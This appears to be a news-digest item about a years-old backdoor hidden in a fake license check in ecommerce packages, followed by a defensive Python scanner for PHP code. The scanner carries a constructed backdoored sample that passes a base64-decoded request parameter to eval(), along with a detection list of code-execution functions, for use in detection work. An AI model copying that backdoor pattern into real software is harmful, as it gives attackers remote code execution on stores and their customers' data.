Monday, May 12, 2025
All the Bits Fit to Print
Supply chain attack infects popular ecommerce software packages
A coordinated supply chain attack has activated a backdoor planted six years ago in popular ecommerce software packages, compromising between 500 and 1,000 stores, including major multinational clients. The attackers had injected malicious code into the vendors' own download servers, so the backdoored packages reached merchants as apparently legitimate software. The backdoor is hidden inside a fake license check and gives the attackers remote code execution on the affected stores.
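The article only says the backdoor masquerades as a license check; it gives no code. Below is an added example, not the vendors' code and not the real backdoor, that shows the kind of triage a store operator can run over a vendor module tree: a lightweight per-file taint check that flags PHP lines where request-derived input reaches a code-execution sink, and notes whether that happens inside license-check code. The two PHP samples are constructed for the example, the sink and source lists are assumptions, and the analysis is a heuristic rather than a sound one.

```python
"""Heuristic scanner for backdoored 'license check' code in PHP ecommerce extensions.

Added example for this page: it is not any vendor's code and not the actual
backdoor. It models the pattern the article describes (a fake license check
through which attacker-supplied input reaches code execution) using two
CONSTRUCTED PHP samples and a small per-file taint check.
"""
import os
import re
from dataclasses import dataclass

# Functions that turn a string into code or a process. A genuine license check
# compares keys or calls home over HTTP; it has no reason to call these.
CODE_SINKS = ("eval", "assert", "system", "exec", "shell_exec", "passthru",
              "popen", "proc_open", "create_function", "include", "require")
# Where untrusted input enters a PHP request handler (assumed list).
REQUEST_SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE", "$_FILES",
                   "$_SERVER", "php://input")

ASSIGN_RE = re.compile(r"(\$\w+)\s*=(?![=>])\s*(.+);")
LICENSE_DEF_RE = re.compile(r"\b(?:class|function)\s+\w*licen[cs]e\w*", re.I)


@dataclass
class Finding:
    path: str
    line: int
    sink: str
    in_license_check: bool  # sink reached from inside license-check code


def _tainted(expr: str, tainted_vars: set[str]) -> bool:
    """True if expr references request input or a variable derived from it."""
    if any(src in expr for src in REQUEST_SOURCES):
        return True
    return any(re.search(re.escape(v) + r"\b", expr) for v in tainted_vars)


def scan_php(path: str, source: str) -> list[Finding]:
    """Flag lines where request-derived data reaches a code-execution sink.

    Taint tracking is deliberately simple: one pass, per file, assignments only.
    It is a triage heuristic for a vendor module tree, not a sound analysis.
    """
    findings: list[Finding] = []
    tainted_vars: set[str] = set()
    in_license = "licen" in os.path.basename(path).lower()
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue  # comments never execute; skip them
        if LICENSE_DEF_RE.search(line):
            in_license = True  # a class or function named like a license check
        m = ASSIGN_RE.search(line)
        if m and _tainted(m.group(2), tainted_vars):
            tainted_vars.add(m.group(1))  # propagate taint through assignment
        for sink in CODE_SINKS:
            if re.search(rf"(?<![\w$]){sink}\s*[(\s]", line) and _tainted(line, tainted_vars):
                findings.append(Finding(path, lineno, sink, in_license))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Scan every .php file under root (for example app/code or vendor/)."""
    out: list[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    out.extend(scan_php(full, fh.read()))
    return out


# Constructed sample: a license helper that only calls home and compares the answer.
BENIGN_SAMPLE = r"""<?php
namespace Vendor\Module\Helper;
class License
{
    public function isValid(string $key): bool
    {
        $resp = file_get_contents('https://licensing.example.com/check?key=' . urlencode($key));
        return json_decode($resp, true)['valid'] ?? false;
    }
}
"""

# Constructed sample: the same helper with a hidden path from a request
# parameter into eval(). The eval call sits on line 9 of this snippet.
BACKDOORED_SAMPLE = r"""<?php
namespace Vendor\Module\Helper;
class License
{
    public function isValid(string $key): bool
    {
        if (isset($_REQUEST['lic_token'])) {
            $payload = base64_decode($_REQUEST['lic_token']);
            eval($payload);
        }
        return true;
    }
}
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("backdoored", BACKDOORED_SAMPLE)):
        hits = scan_php("app/code/Vendor/Module/Helper/License.php", src)
        print(label, [(h.line, h.sink, h.in_license_check) for h in hits])
```

Run `scan_tree("app/code")` or `scan_tree("vendor")` on a store and review every hit by hand; a match outside license code is still worth a look, but a code sink fed from request input inside a license helper is exactly the shape the article describes and should be treated as a compromise until proven otherwise.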
Why it matters: The attack impacts numerous ecommerce stores, risking customer data and transactions through compromised vendor software.
The big picture: Supply chain attacks abuse the trust merchants place in code shipped from a vendor's own servers; a backdoor that sits dormant for years passes routine review precisely because it arrived through the legitimate channel, and every store that installed the package is exposed at once.
Vendor responses: Some vendors deny having been breached or have not responded at all, yet continue to host the backdoored packages publicly.
Commenters say: Many highlight the critical risk of the backdoor's remote code execution capability and criticize the vendors for poor incident response and for continuing to distribute the compromised software.